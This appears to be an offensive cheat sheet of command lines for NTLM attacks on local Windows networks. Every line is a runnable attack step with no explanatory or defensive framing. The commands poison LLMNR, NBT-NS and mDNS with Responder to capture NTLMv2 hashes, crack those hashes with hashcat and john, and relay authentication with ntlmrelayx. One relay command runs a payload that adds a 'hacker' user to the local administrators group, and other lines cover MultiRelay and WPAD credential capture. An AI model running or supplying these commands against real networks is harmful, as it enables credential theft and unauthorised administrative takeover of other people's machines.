Responder poisons LLMNR, NBT-NS, and mDNS to capture NTLMv2 hashes from Windows hosts on the local network.
responder -I eth0 -rdwv
responder -I eth0 -A
responder -I eth0
responder -I eth0 -P
responder -I eth0 -f
cat /usr/share/responder/logs/SMB-NTLMv2-*.txt
hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt
john hashes.txt --wordlist=rockyou.txt --format=netntlmv2
responder -I eth0 --lm --disable-ess
impacket-ntlmrelayx -tf targets.txt -smb2support
impacket-ntlmrelayx -tf targets.txt -smb2support -c "net user hacker Password1 /add && net localgroup administrators hacker /add"
# Edit /etc/responder/Responder.conf: set SMB=Off, HTTP=Off before relay
python MultiRelay.py -t 10.10.10.1 -u ALL
# WPAD attack: responder -I eth0 -w -P captures proxy credentials